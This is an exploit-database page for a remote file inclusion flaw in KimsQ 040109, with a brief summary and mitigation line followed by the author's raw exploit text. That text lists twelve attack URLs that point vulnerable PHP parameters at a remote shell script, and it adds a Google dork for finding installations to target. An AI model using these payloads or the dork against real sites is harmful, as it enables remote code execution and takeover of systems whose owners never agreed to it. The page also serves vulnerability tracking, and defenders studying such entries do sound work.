header-logo
Suggest Exploit
vendor:
KimsQ
by:
mat
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: KimsQ
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

KimsQ 040109 Multiple Remote File Include Vulnerability

The KimsQ script is vulnerable to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by including malicious files from a remote server, which can lead to arbitrary code execution or unauthorized access to sensitive information.

Mitigation:

To mitigate the vulnerability, it is recommended to update to a patched version of the KimsQ script or apply appropriate security measures such as input validation and sanitization.
Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
KimsQ 040109 Multiple Remote File Include Vulnerability
Script: http://kimsq.googlecode.com/files/kimsq_v040109.zip
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

//------------------------------------------------------------------+

http://[target]/[path]/_sys/_ext/module/chat/default/q/user.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/contentsbox/default/admin/config.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/counter/default/admin/referer.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/info.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/log.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.gallery.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.profile.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/survey/default/_admin.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_blog/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_board/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_gallery/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_webzine/comment.php?bbs[skin]=http://[shellscript]

//------------------------------------------------------------------+

Google Dork: "kims Q - Administrator Login Mode"

Greetings: All Hackerz

Navigation

Suggest Exploit

Services By CQR